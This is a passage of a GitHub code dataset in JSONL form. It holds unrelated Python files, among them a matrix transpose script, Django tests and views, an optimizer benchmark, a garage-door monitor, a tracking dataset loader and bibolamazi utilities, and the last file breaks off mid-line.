dengan perulangan bertingkat\r\n\r\nprint (\"Matriks yang akan di transpose : \")\r\nfor i in range (baris):\r\n for j in range (kolom):\r\n print (str(M[i][j])+\"\", end='')\r\n print ( )\r\n\r\n#Proses mengubah ke transpose matriks dengan perulangan bertingkat\r\n\r\nprint (\"Transpose Matriks: \")\r\nfor i in range (kolom):\r\n for j in range (baris):\r\n print (str(M[j][i])+\" \", end='')\r\n 
print ( )","repo_name":"DarellTimothy/Python-Projects","sub_path":"Program That Transposes Matrices.py","file_name":"Program That Transposes Matrices.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36095931156","text":"#!/usr/bin/env python3\n\n\"\"\"Test Account Activation \nTest for '200: Account has been authorized.', '404: Credentials not found.',\nand '403: Requestor's credentials were rejected.'\n\"\"\"\n\nimport time\nfrom django.test import TestCase, Client\n\nclass ApiAccountsActivateTestCase(TestCase):\n fixtures = ['tests/fixtures/test_data']\n\n def setUp(self):\n self.client = Client()\n data = {\n 'hostname': 'UserDB',\n 'email': 'test@gwu.edu',\n 'token': 'SampleToken'\n }\n \n self.initial_response = self.client.post('/api/accounts/new/', data=data).json()\n\n def test_account_activated_forbidden(self):\n \"\"\"Test for '403: Requestor's credentials were rejected.'\n \"\"\"\n\n bad_link = self.initial_response['activation_link']+ \"bad_content\"\n response = self.client.get(bad_link)\n self.assertEqual(response.status_code, 403)","repo_name":"biocompute-objects/bco_api","sub_path":"tests/test_views/test_api_account_activate.py","file_name":"test_api_account_activate.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"42503325709","text":"\"\"\"Benchmarking optimization algorithm\n\"\"\"\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom optim.test_function import test_functions\n\ndef get_test_functions_for_dim(dim):\n ans = [tf(n=dim) for tf in test_functions]\n return [tf.__class__ for tf in ans if dim==tf.n]\n\ndef benchmark(optimizers, initial_condition):\n dim = initial_condition.shape[-1]\n columns = [\"Optimizer\",\"Test function\",\"runtime\",\"l2_error\",\"optimizer\"]\n data = {k:[] for k in columns}\n results = pd.DataFrame(data = data, columns=columns)\n if isinstance(optimizers, list):\n for optimizer in optimizers:\n results = results.append(benchmark(optimizer, initial_condition))\n return results\n for tf in get_test_functions_for_dim(dim):\n # instantiate the test function\n F = tf(n=dim)\n # solve the optimization problem with the algorithm\n t0 = time.time()\n x_solution = optimizers.optimize(F, x0=initial_condition)\n t0 = time.time() - t0\n # get distance to optimal solution\n if len(F.x_star.shape)==1:\n l2_norm = np.linalg.norm(F.x_star - x_solution)\n else:\n l2_norm = np.linalg.norm(F.x_star - x_solution, axis=1)\n l2_norm = np.min(l2_norm)\n results = results.append({\"Optimizer\":optimizers.__class__.__name__,\n \"Test function\":tf.__name__,\n \"runtime\":t0,\n \"l2_error\":l2_norm,\n \"optimizer\":optimizers,\n \"iterations\":optimizers.it}, ignore_index=True)\n #results[\"iterations\"]=[o.it for o in results[\"optimizer\"]]\n return results\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ndef test_function_result_bar_plot(results, title=\"Test function optimization\", **seaborn_kwargs):\n ax=sns.barplot(x=\"l2_error\", y=\"Test function\",orient=\"h\",data=results,**seaborn_kwargs)\n #ax.set_xticklabels(labels,rotation=45)\n ax.grid(True)\n ax.set_title(title)\n ax.set_xlabel(\"1 / ||\\hat{x} - x^*||\")\n return ax\n\ndef iteration_bar_plot(results, title=\"Test function optimization\",**seaborn_kwargs):\n ax=sns.barplot(x=\"iterations\", y=\"Test function\",orient=\"h\",data=results,**seaborn_kwargs)\n 
ax.grid(True)\n ax.set_title(title)\n ax.set_xlabel(\"iterations\")\n return ax\n\ndef runtime_bar_plot(results, title=\"Test function optimization\", **seaborn_kwargs):\n ax=sns.barplot(x=\"runtime\", y=\"Test function\",orient=\"h\",data=results, **seaborn_kwargs)\n #ax.set_xticklabels(labels,rotation=45)\n ax.grid(True)\n ax.set_title(title)\n ax.set_xlabel(\"runtime (ms)\")\n return ax\n\n\n\nif __name__==\"__main__\":\n from optim.utils import print_dict\n\n # test the RandomOptimizer\n from optim.blackbox.random import RandomOptimizer\n from optim.blackbox.pattern import NelderMead\n from optim.blackbox.cmaes import CMAES\n\n optimizer = RandomOptimizer()\n x0 = np.random.random_sample(5)\n results = benchmark(optimizer, x0)\n \n # create a first simple figure\n #print_dict(results)\n\n #ax = test_function_result_bar_plot(results)\n #plt.show()\n #ax = iteration_bar_plot(results)\n #plt.show()\n #ax = runtime_bar_plot(results)\n #plt.show()\n\n optimizers = [RandomOptimizer(), CMAES(), NelderMead()]\n results = benchmark(optimizers, x0)\n print(results)\n\n ax = test_function_result_bar_plot(results, hue=\"Optimizer\")\n plt.show()\n ax = iteration_bar_plot(results, hue=\"Optimizer\")\n plt.show()\n ax = runtime_bar_plot(results, hue=\"Optimizer\")\n plt.show()\n\n\n\n\n\n","repo_name":"Dolgalad/optim","sub_path":"optim/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73234144256","text":"from threading import Thread, Event\r\nfrom time import sleep\r\nfrom garage import Garage\r\nimport logging\r\nfrom time import time\r\n\r\nlogger = logging.getLogger('garage_state_mon')\r\n\r\nclass LastStateTransitionMonitor(Thread):\r\n\r\n\tdef __init__(self, dao, config, state=Garage.closed, notify_callback=None):\r\n\t\tThread.__init__(self)\r\n\t\tself._dao = dao\r\n\t\tself._config = config\r\n\t\tself._notify_callback = notify_callback\r\n\t\tself._state = state\r\n\t\tself._stop_event = Event()\r\n\t\t\r\n\t\r\n\tdef check_now(self):\r\n\t\tlast_time = self._dao.last_state_transition_from(self._state)\r\n\t\tif last_time is None:\r\n\t\t\tlogger.info(\"No notification required, already in \"+self._state+\" state\")\r\n\t\t\treturn\r\n\t\tif last_time == 0: \t\t\t\r\n\t\t\tmsg = 'Garage Door has never been '+self._state\r\n\t\telse:\r\n\t\t\tdiff = int(( time() - last_time ) / 60)\r\n\t\t\tself._config.reload()\r\n\t\t\tlimit = self._config['state_monitor_limit_mins']\r\n\t\t\tif diff < limit: return\r\n\t\t\tif diff > 99: diff_msg = str(round(diff/60))+' hours'\r\n\t\t\telif diff > 2880: diff_msg = str(round(diff/1440))+' days'\r\n\t\t\telse: diff_msg = str(diff)+' minutes'\r\n\t\t\tmsg = 'Garage Door has not been '+self._state+' for '+diff_msg\r\n\t\tlogger.info(msg)\r\n\t\tif self._notify_callback and self._config['state_monitor_enabled']: self._notify_callback(msg)\r\n\r\n\tdef run(self):\r\n\t\twhile 1:\r\n\t\t\tself.check_now()\r\n\t\t\tself._config.reload()\r\n\t\t\tself._stop_event.wait(self._config['state_monitor_interval_mins'] * 60)\r\n\t\t\tif( self._stop_event.is_set() ): break\r\n\t\t\r\n\tdef stop(self):\r\n\t\tself._stop_event.set()\r\n\t\r\nif __name__ == '__main__':\r\n\tfrom garage_dao import GarageDao\r\n\tfrom garage_config import GarageConfig\r\n\tdef callback(msg):\r\n\t\tprint(msg)\r\n\tlogging.basicConfig(filename=__file__+'.log',level=logging.DEBUG)\r\n\tLastStateTransitionMonitor(GarageDao(),GarageConfig(), 
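In `check_now` above, the `diff > 2880` branch is unreachable: any `diff` above 2880 already satisfies `diff > 99`, so the "days" message can never be produced. Testing the larger threshold first fixes it (`diff` is in minutes, so 2880 minutes is two days):

```python
# Corrected branch order: largest threshold first.
if diff > 2880:
    diff_msg = str(round(diff/1440)) + ' days'
elif diff > 99:
    diff_msg = str(round(diff/60)) + ' hours'
else:
    diff_msg = str(diff) + ' minutes'
```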
state=Garage.opening, notify_callback=callback).run()\r\n","repo_name":"drweaver/py_garage_server","sub_path":"garage_state_mon.py","file_name":"garage_state_mon.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"44002005244","text":"# coding=utf-8\nimport json\n\nfrom channels.generic.websockets import WebsocketDemultiplexer\nfrom django.core.serializers import serialize\nfrom django.db.models import QuerySet\n\n\nclass Consumer(object):\n stream = NotImplemented\n actions = NotImplemented\n fields = NotImplemented\n\n def __init__(self):\n self.user = NotImplemented\n self.pk = NotImplemented\n self.action = NotImplemented\n self.message = NotImplemented\n self.kwargs = NotImplemented\n self.data = NotImplemented\n self.payload = NotImplemented\n\n @classmethod\n def encode(cls, stream, payload):\n raise NotImplementedError()\n\n @classmethod\n def consumer(cls, message, **kwargs):\n from django.contrib.auth.models import AnonymousUser\n\n # INBOUND\n self = cls()\n self.message = message\n self.kwargs = kwargs\n self.user = getattr(self.message, \"user\", AnonymousUser())\n self.action, self.pk, self.data = self.deserialize(self.message)\n self.data = self.run_action(self.action, self.pk)\n\n if not self.data:\n return self\n\n # OUTBOUND\n self.payload = self.serialize(self.data)\n\n if self.payload == {}:\n return self\n\n assert self.stream is not None\n message = cls.encode(self.stream, self.payload)\n self.send(message)\n return self\n\n def serialize(self, message):\n raise NotImplementedError()\n\n def deserialize(self, message):\n raise NotImplementedError()\n\n def run_action(self, action, pk):\n if action not in self.actions:\n raise ValueError('Bad action. Action must be white listed. 
action=%s' % action)\n\n if not self.has_permission(self.user, action, pk):\n return\n\n method = getattr(self, action)\n return method()\n\n def has_permission(self, user, action, pk):\n raise NotImplementedError()\n\n def send(self, message):\n raise NotImplementedError()\n\n\nclass ReplyChannelConsumer(Consumer):\n model = NotImplemented\n\n @classmethod\n def encode(cls, stream, payload):\n return WebsocketDemultiplexer.encode(stream, payload)\n\n @classmethod\n def serialize_data(cls, instance, fields):\n fields = None if fields == ['__all__'] else fields\n if isinstance(instance, (QuerySet, list)):\n data = serialize('json', instance, fields=fields)\n return json.loads(data)\n\n data = serialize('json', [instance], fields=fields)\n return json.loads(data)[0]['fields']\n\n @property\n def queryset(self):\n return self.model.objects.all()\n\n @property\n def model_label(self):\n return \"%s.%s\" % (\n self.model._meta.app_label.lower(),\n self.model._meta.object_name.lower(),\n )\n\n def serialize(self, data):\n payload = {\n \"action\": self.action,\n \"data\": self.serialize_data(data, self.fields),\n \"model\": self.model_label,\n }\n if self.pk is not None:\n payload['pk'] = self.pk\n return payload\n\n def deserialize(self, message):\n \"\"\"\n You must hook this up behind a Deserializer, so we expect the JSON\n already dealt with.\n \"\"\"\n action = message['action']\n pk = message.get('pk', None)\n data = message.get('data', None)\n return action, pk, data\n\n def send(self, message):\n self.message.reply_channel.send(message)\n","repo_name":"manuphatak/live_people_app","sub_path":"live_people_app/utils/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"73591449536","text":"import os\n\nimport torch.utils.data as data\nfrom os.path import join\nimport cv2\nimport json\nimport numpy as np\nfrom util import cxy_wh_2_bbox, crop_hwc\n\n\n\n#个人数据集\nclass OTB(data.Dataset):\n def __init__(self, root_path = \"\", range=10, train=True):\n self.domain2nseq = json.load(open(os.path.join(root_path,\"OTB100.json\"), 'r'))\n self.domain_list = list(self.domain2nseq.keys())\n self.root_path = root_path\n self.range = range\n self.train = train\n self.mean = np.expand_dims(np.expand_dims(np.array([109, 120, 119]), axis=1), axis=1).astype(np.float32)\n\n\n def __getitem__(self, item):\n # 随机抽取名字\n domain_name = np.random.choice(self.domain_list, size=1)[0]\n # 随机抽取两个idx\n target_id, search_id = self.getnewtwoframes(domain_name)\n \n # 获取frame_name、gt和img——name\n frame_name = self.domain2nseq[domain_name]['name']\n imgs_name = self.domain2nseq[domain_name]['image_files']\n imgs_gt = self.domain2nseq[domain_name]['gt_rect']\n\n target_gt = [imgs_gt[target_id][0], imgs_gt[target_id][1],imgs_gt[target_id][2], imgs_gt[target_id][3]]\n search_gt = [imgs_gt[search_id][0], imgs_gt[search_id][1], imgs_gt[search_id][2], imgs_gt[search_id][3]]\n\n #加载target和search图像\n target = cv2.imread(os.path.join(self.root_path, \"OTB100\", frame_name, \"img\", imgs_name[target_id]))\n search = cv2.imread(os.path.join(self.root_path, \"OTB100\", frame_name, \"img\", imgs_name[search_id]))\n\n #利用gt裁剪target和search图像\n target = self.crop_image(target,target_gt)\n search = self.crop_image(search,search_gt)\n\n\n target = np.transpose(target, (2, 0, 1)).astype(np.float32) - self.mean\n search = np.transpose(search, (2, 0, 1)).astype(np.float32) - self.mean\n\n return target, 
search\n def crop_image(self,image ,bbox):\n target_pos = [bbox[0] + (bbox[2])/2-1, bbox[1] + (bbox[3])/2-1]\n target_sz = np.array([bbox[2] , bbox[3]])\n window_sz = target_sz * 3\n crop_bbox = cxy_wh_2_bbox(target_pos, window_sz)\n patch = crop_hwc(image, crop_bbox, 125)\n return patch\n def getnewtwoframes(self, domain_name):\n # 获得帧列表\n num_frames = self.domain2nseq[domain_name]['image_files']\n # 随机抽取两帧并排序,两帧之间的间隔不大于100帧\n z_frame_nos = np.random.choice(range(0, len(num_frames) - 2), size=1, replace=False)\n x_frame_nos = np.random.choice(range(z_frame_nos[0], min(len(num_frames)-1, z_frame_nos[0] + self.range)), size=1,\n replace=False)\n return z_frame_nos[0], x_frame_nos[0]\n def __len__(self):\n if self.train:\n return 64000\n else:\n return 1280\n","repo_name":"Simon-Chenzw/SCUT-SE","sub_path":"computer_vision/assignment-4/DCFNET/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"79"} +{"seq_id":"26874842496","text":"import re\nimport types\nimport math\nimport datetime\nimport logging\n\nfrom pylatexenc import latex2text\n\nimport bibolamazi.init\nfrom . import version\n\nlogger = logging.getLogger(__name__)\n\n\n\ndef get_version():\n \"\"\"\n Return the version string :py:data:`~core.version.version_str`, unchanged.\n \"\"\"\n return version.version_str\n\n_theversionsplit = None\n\ndef get_version_split():\n \"\"\"\n Return a 4-tuple `(maj, min, rel, suffix)` resulting from parsing the version obtained\n via :py:data:`version.version_str`.\n\n ............ TODO: FIXME: CURRENTLY, the elements are strings! why not integers? If\n not there, they will/should be empty or None?\n\n \"\"\"\n if (_theversionsplit is None):\n m = re.match(r'^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(.+)?)?)?', version.version_str)\n _theversionsplit = (m.group(1), m.group(2), m.group(3), m.group(4))\n return _theversionsplit\n\n\ndef get_copyrightyear():\n \"\"\"\n Return the copyright year :py:data:`~core.version.copyright_year`, unchanged.\n \"\"\"\n return version.copyright_year\n\n\n# ------------------------------------------------------------------------------\n\n\n\nclass BibolamaziError(Exception):\n \"\"\"\n Root bibolamazi error exception.\n\n See also :py:class:`~core.bibfilter.BibFilterError` and\n :py:class:`~core.bibusercache.BibUserCacheError`.\n \"\"\"\n def __init__(self, msg, where=None):\n self.where = where\n fullmsg = msg\n if (where is not None):\n fullmsg += \"\\n\\t@: \"+where\n\n super().__init__(fullmsg)\n\n\n# ------------------------------------------------------------------------------\n\ndef getbool(x):\n \"\"\"\n Utility to parse a string representing a boolean value.\n\n If `x` is already of integer or boolean type (actually, anything castable to an\n integer), then the corresponding boolean convertion is returned. If it is a\n string-like type, then it is matched against something that looks like 't(rue)?', '1',\n 'y(es)?' or 'on' (ignoring case), or against something that looks like 'f(alse)?',\n '0', 'n(o)?' or 'off' (also ignoring case). Leading or trailing whitespace is ignored. 
\n If the string cannot be parsed, a :py:exc:`ValueError` is raised.\n \"\"\"\n try:\n return (int(x) != 0)\n except (TypeError, ValueError):\n pass\n if isinstance(x, str):\n m = re.match(r'^\\s*(t(?:rue)?|1|y(?:es)?|on)\\s*$', x, re.IGNORECASE)\n if m:\n return True\n m = re.match(r'^\\s*(f(?:alse)?|0|n(?:o)?|off)\\s*$', x, re.IGNORECASE)\n if m:\n return False\n raise ValueError(\"Can't parse boolean value: %r\" % x)\n\n\n\ndef resolve_type(typename, in_module=None):\n \"\"\"\n Returns a type object corresponding to the given type name `typename`, given as a\n string.\n\n ..... TODO: MORE DOC .........\n \"\"\"\n\n if (in_module is not None):\n logger.longdebug(\"Resolving type %s in module %s\", typename, in_module)\n if (typename in in_module.__dict__):\n return in_module.__dict__.get(typename)\n\n logger.longdebug(\"Resolving type %s (no module)\", typename)\n\n if (typename == 'str'):\n try:\n return types.StringType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return str\n if (typename == 'bool'):\n try:\n return types.BooleanType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return bool\n if (typename == 'int'):\n try:\n return types.IntType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return int\n if (typename == 'float'):\n try:\n return types.FloatType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return float\n if (typename == 'bytes'):\n try:\n return types.StringType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return bytes\n if (typename == 'complex'):\n try:\n return types.ComplexType\n except AttributeError: # Python 3 doesn't have types.BooleanType etc.\n return complex\n\n raise ValueError(\"Unknown type name: %s\"%(typename))\n\n\n_rx_quotearg_oknames = re.compile(r'^[-\\w./:~%#]+$')\n\ndef quotearg(x):\n \"\"\"\n If `x` contains only non-special characters, it is returned as is. The\n non-special characters are: all alphanumerical chars, hyphen, dot, slash,\n colon, tilde, percent, hash. 
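The try/except ladder in `resolve_type` above exists only to fall back to the Python 2 `types` aliases; on Python 3 the whole dispatch reduces to a lookup table. A sketch (note the original maps `'bytes'` to `types.StringType`, a Python 2-ism; mapping it to `bytes` is the natural Python 3 choice):

```python
_BUILTIN_TYPES = {'str': str, 'bool': bool, 'int': int,
                  'float': float, 'bytes': bytes, 'complex': complex}

def resolve_type(typename, in_module=None):
    if in_module is not None and typename in in_module.__dict__:
        return in_module.__dict__[typename]
    try:
        return _BUILTIN_TYPES[typename]
    except KeyError:
        raise ValueError("Unknown type name: %s" % typename)
```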
Otherwise, put the value `x` in double-quotes,\n escaping all double-quotes and backslashes in the value of `x` by a\n backslash.\n\n The argument `x` may be either a python string or unicode object.\n\n For example:\n >>> print(quotearg('kosher_name_clean'))\n kosher_name_clean\n >>> print(quotearg('dirty name with spaces'))\n \\\"dirty name with spaces\\\"\n >>> print(quotearg(r'''really\\\\dirty\\\"name::with/tons&#$of special chars!!!'''))\n \\\"really\\\\\\\\dirty\\\\\\\"name::with/tons&#$of special chars!!!\\\"\n \"\"\"\n if not x:\n return \"\"\n if (_rx_quotearg_oknames.match(x)):\n # only very sympathetic chars\n return x\n return '\"' + re.sub(r'(\"|\\\\)', lambda m: '\\\\'+m.group(), x) + '\"'\n\n\n\n\n\ndef guess_encoding_decode(dat, encoding=None):\n\n if isinstance(dat, str):\n return dat # already unicode\n\n if encoding:\n return dat.decode(encoding)\n\n try:\n return dat.decode('utf-8')\n except UnicodeDecodeError:\n pass\n\n # this should always succeed\n return dat.decode('latin1')\n\n\n\n\n\n\ndef call_with_args(fn, *args, **kwargs):\n \"\"\"\n Utility to call a function `fn` with `*args` and `**kwargs`.\n\n `fn(*args)` must be an acceptable function call; beyond that, additional keyword\n arguments which the function accepts will be provided from `**kwargs`.\n\n This function is meant to be essentially `fn(*args, **kwargs)`, but without raising an\n error if there are arguments in `kwargs` which the function doesn't accept (in which\n case, those arguments are ignored).\n \"\"\"\n\n args2 = args\n kwargs2 = kwargs\n if hasattr(fn, '__call__'):\n args2 = [fn] + args\n fn = fn.__call__\n\n (fargs, varargs, keywords, defaults) = inspect.getargspec(fn)\n\n if keywords:\n return fn(*args2, **kwargs2)\n \n kwargs2 = dict([(k,v) for (k,v) in kwargs2 if k in fargs])\n return fn(*args2, **kwargs2)\n\n\n\n\n_rx_timedelta_part = re.compile(r'(?P\\d+(?:\\.\\d*)?|\\d*\\.\\d+)(?P\\w+)', flags=re.IGNORECASE)\n \ndef parse_timedelta(in_s):\n \"\"\"\n Note: only positive timedelta accepted.\n \"\"\"\n\n # all-lowercase, please\n keys = {\"weeks\": (7, 'days'),\n \"days\": (24, 'hours'),\n \"hours\": (60, 'minutes'),\n \"minutes\": (60, 'seconds'),\n \"seconds\": (1000, 'milliseconds'),\n }\n\n kwargs = {}\n for k in keys.keys():\n kwargs[k] = 0.0\n kwargs[keys[k][1]] = 0.0\n\n for m in _rx_timedelta_part.finditer(in_s):\n unit = m.group('unit').lower()\n keyoks = [x for x in keys if x.startswith(unit)]\n if len(keyoks) < 1:\n raise ValueError(\"Unknown unit for timedelta: %s\" %(unit))\n if len(keyoks) > 1:\n raise ValueError(\"Ambiguous unit for timedelta: %s\" %(unit)) # should never happen\n \n key = keyoks[0]\n value = float(m.group('value'))\n value_int = math.floor(value)\n kwargs[key] += value_int\n\n x = value - value_int\n\n while True:\n x *= keys[key][0]\n newkey = keys[key][1]\n v = math.floor(x)\n kwargs[newkey] += v\n x = (x - v)\n\n key = newkey\n if key not in keys:\n break\n \n #print 'kwargs: %r'%(kwargs)\n return datetime.timedelta(**kwargs)\n\n\n\ndef warn_deprecated(classname, oldname, newname, modulename=None, explanation=None):\n import traceback\n\n if modulename is not None:\n warnlogger = logging.getLogger(modulename)\n else:\n warnlogger = logger\n\n warnlogger.warning(\n (\"%(modulenamecolon)s%(classnamedot)s%(oldname)s is deprecated. Please use \"\n \"%(modulenamecolon)s%(classnamedot)s%(newname)s instead. %(explanationspace)s\"\n \"at:\\n\"\n \"%(stack)s\")\n % { 'classnamedot': (classname+'.' 
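As written, `call_with_args` above cannot run: `inspect` is never imported, `[fn] + args` concatenates a list with a tuple (a `TypeError`), the kwargs filter iterates the dict itself instead of `.items()`, and `inspect.getargspec` was removed in Python 3.11. A working sketch of the same idea using `inspect.signature`:

```python
import inspect

def call_with_args(fn, *args, **kwargs):
    # If fn accepts **kwargs itself, pass everything through unchanged.
    params = inspect.signature(fn).parameters
    if any(p.kind is inspect.Parameter.VAR_KEYWORD for p in params.values()):
        return fn(*args, **kwargs)
    # Otherwise drop keyword arguments the callable does not declare.
    kwargs = {k: v for k, v in kwargs.items() if k in params}
    return fn(*args, **kwargs)
```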
if classname else ''),\n 'modulenamecolon': (modulename+':' if modulename else ''),\n 'oldname': oldname,\n 'newname': newname,\n 'explanationspace': (explanation+' ' if explanation else ''),\n 'stack': traceback.format_stack(limit=3)[0],\n }\n )\n\n\n# ------------------------------------------------------------------------------\n\n# _latex2text_default_text_replacements = (\n# (\"~\", \" \"),\n# (\"``\", '\"'),\n# (\"''\", '\"'),\n# #\n# # do NOT replace tabular alignment symbol '&', because most often it's used\n# # in names perhaps unescaped, like in \"Taylor & Francis\"\n# )\n\nlatex2text_latex_context = latex2text.get_default_latex_context_db()\n# in most instances when converting to text, keep ``, '', --, ---, etc. as they are\nlatex2text_latex_context.add_context_category(\n 'override-nonascii-specials',\n prepend=True,\n macros=[],\n environments=[],\n specials=[\n latex2text.SpecialsTextSpec('~', u\" \"),\n latex2text.SpecialsTextSpec('``', u\"\\\"\"),\n latex2text.SpecialsTextSpec(\"''\", u\"\\\"\"),\n latex2text.SpecialsTextSpec(\"--\", u\"--\"),\n latex2text.SpecialsTextSpec(\"---\", u\"---\"),\n latex2text.SpecialsTextSpec(\"!`\", u\"!`\"),\n latex2text.SpecialsTextSpec(\"?`\", u\"?`\"),\n ]\n)\n\n_l2t = latex2text.LatexNodes2Text(\n strict_latex_spaces=True,\n latex_context=latex2text_latex_context,\n)\n\n\ndef latex_to_text(x):\n\n return _l2t.latex_to_text(x, tolerant_parsing=True)\n","repo_name":"phfaist/bibolamazi","sub_path":"bibolamazi/core/butils.py","file_name":"butils.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"7452093091","text":"from decimal import Decimal\r\nfrom django.shortcuts import render, redirect\r\nfrom django.db.models import Sum\r\nfrom .models import Comissao\r\nfrom contrato.models import Contrato\r\nfrom datetime import datetime\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nimport csv\r\nfrom cliente.models import Cliente\r\nfrom meuapp.utils import login_required_all\r\n\r\n@login_required_all\r\ndef calcular_comissao_old(request):\r\n if request.method == 'POST':\r\n data = request.POST.get('mes_ano')\r\n\r\n contratos_selecionadas = request.POST.getlist('contratos')\r\n\r\n # Obter as contratos selecionadas\r\n contratos_do_mes = Contrato.objects.filter(pk__in=contratos_selecionadas)\r\n\r\n # Calcular o número total de contratos selecionadas do mês\r\n numero_contratos = contratos_do_mes.count()\r\n\r\n # Calcular o valor total das contratos selecionadas do mês\r\n valor_contratos = contratos_do_mes.aggregate(total=Sum('total_contrato'))['total'] or 0\r\n\r\n #Recuperar contratos totais\r\n contratos_totais = Contrato.objects.aggregate(total=Sum('total_contrato'))['total'] or 0\r\n\r\n # Calcular a comissão\r\n if numero_contratos < 10:\r\n comissao_acumulada = Decimal(contratos_totais) * Decimal(0.05)\r\n comissao_mes = Decimal(valor_contratos)\r\n elif 10 <= numero_contratos <= 20:\r\n comissao_acumulada = Decimal(valor_contratos) * Decimal(0.05)\r\n comissao_mes = Decimal(valor_contratos) * 2\r\n else:\r\n comissao_acumulada = Decimal(valor_contratos) * Decimal(0.05)\r\n comissao_mes = Decimal(valor_contratos) * 3\r\n\r\n # Criar um objeto Comissao com os valores calculados\r\n comissao = Comissao(\r\n data=data,\r\n quantidade_contratos=numero_contratos,\r\n valor_contratos_mes=valor_contratos,\r\n comissao_acumulada=comissao_acumulada,\r\n comissao_mes=comissao_mes,\r\n comissao_total=comissao_mes + 
comissao_acumulada\r\n )\r\n comissao.save()\r\n Contrato.objects.filter(pk__in=contratos_selecionadas).update(comissao_id=comissao.id)\r\n contratos = Contrato.objects.filter(comissao_id__isnull=True)\r\n return render(request, 'listar_contratos_comissao.html', {'contratos_totais': contratos_totais, 'contratos': contratos})\r\n else:\r\n data_atual = datetime.datetime.now()\r\n # Subtrai 1 mês da data atual para obter o mês anterior\r\n mes_anterior = data_atual.month - 1\r\n ano_atual = data_atual.year\r\n if mes_anterior == 0:\r\n # Caso especial: se o mês anterior for janeiro, ajusta o ano para o ano anterior\r\n mes_anterior = 12\r\n ano_atual -= 1\r\n\r\n # Passa a variável mes_anterior para o contexto do template\r\n mes_anterior = '{:02d}/{}'.format(mes_anterior, ano_atual)\r\n print(mes_anterior)\r\n contratos = Contrato.objects.filter(comissao_id__isnull=True)\r\n return render(request, 'listar_contratos_comissao.html', {'contratos': contratos, 'mes_anterior': mes_anterior})\r\n\r\n@login_required_all\r\ndef fechar_comissao(request):\r\n if request.method == 'POST':\r\n # Obtém a data selecionada no formulário como uma string\r\n data_str = request.POST.get('data')\r\n\r\n # Converte a string de data em um objeto date\r\n data = datetime.strptime(data_str, '%Y-%m').date()\r\n print(data)\r\n # Obtém todos os contratos do mês selecionado\r\n contratos_mes = Contrato.objects.filter(data_instalacao__month=data.month, data_instalacao__year=data.year, flcancelado=False)\r\n print(contratos_mes)\r\n # Verifica a quantidade de contratos do mês selecionado\r\n quantidade_contratos_mes = contratos_mes.count()\r\n todos_contratos = Contrato.objects.filter(flcancelado=False)\r\n\r\n # Remove todos os registros de comissão existentes para o mês selecionado\r\n Comissao.objects.filter(data=data_str).delete()\r\n\r\n # Percorre todos os contratos do mês selecionado\r\n for contrato in todos_contratos:\r\n vendedor_id = contrato.vendedor_id\r\n quantidade_contratos_mes_vendedor = Contrato.objects.filter(vendedor_id=vendedor_id, data_instalacao__month=data.month, data_instalacao__year=data.year).count()\r\n # Verifica se o contrato é de um mês anterior à data selecionada\r\n if (contrato.data_instalacao.month < data.month or contrato.data_instalacao.year < data.year) and contrato.vendedor_id == 2:\r\n # Atribui 5% do valor do contrato como comissão\r\n valor_comissao_retroativa = contrato.total_contrato * Decimal('0.05')\r\n comissao_valor_contrato = 0\r\n elif contrato.data_instalacao.month < data.month or contrato.data_instalacao.year < data.year and contrato.vendedor_id != 2:\r\n # Atribui 5% do valor do contrato como comissão\r\n valor_comissao_retroativa = 0\r\n comissao_valor_contrato = 0\r\n elif contrato.data_instalacao.month > data.month or contrato.data_instalacao.year > data.year:\r\n valor_comissao_retroativa = 0\r\n comissao_valor_contrato = 0\r\n else:\r\n # Calcula a comissão com base na quantidade de contratos do mês\r\n if quantidade_contratos_mes_vendedor < 7.5:\r\n comissao_valor_contrato = contrato.total_contrato\r\n valor_comissao_retroativa = 0\r\n elif 7.5 <= quantidade_contratos_mes_vendedor <= 10:\r\n comissao_valor_contrato = contrato.total_contrato * Decimal('1.5')\r\n valor_comissao_retroativa = 0\r\n else:\r\n comissao_valor_contrato = contrato.total_contrato * Decimal('2')\r\n valor_comissao_retroativa = 0\r\n\r\n # Cria uma nova instância de Comissao com os valores calculados para o contrato\r\n comissao = Comissao(data=data_str, 
valor_contrato_mes=comissao_valor_contrato, contrato=contrato, valor_comissao_retroativa=valor_comissao_retroativa)\r\n\r\n # Salva a comissão no banco de dados\r\n comissao.save()\r\n\r\n # Redireciona para a página de comissões\r\n comissoes = Comissao.objects.values('data', 'contrato__vendedor__nome').annotate(soma_comissao=Sum('valor_contrato_mes'))\r\n return render(request, 'listar_comissoes.html', {'comissoes': comissoes})\r\n return render(request, 'fechar_comissao.html')\r\n\r\n@login_required_all\r\ndef calcular_comissao():\r\n # Obtém todas as comissões\r\n comissoes = Comissao.objects.all()\r\n\r\n # Cria um dicionário para armazenar os resultados por mês\r\n resultados = {}\r\n\r\n # Percorre todas as comissões\r\n for comissao in comissoes:\r\n # Obtém a data da comissão\r\n data = comissao.data\r\n\r\n # Obtém a quantidade de contratos para o mês da comissão\r\n contratos_mes = Comissao.objects.filter(data=data).count()\r\n\r\n # Obtém a quantidade total de contratos até o mês da comissão\r\n contratos_total = 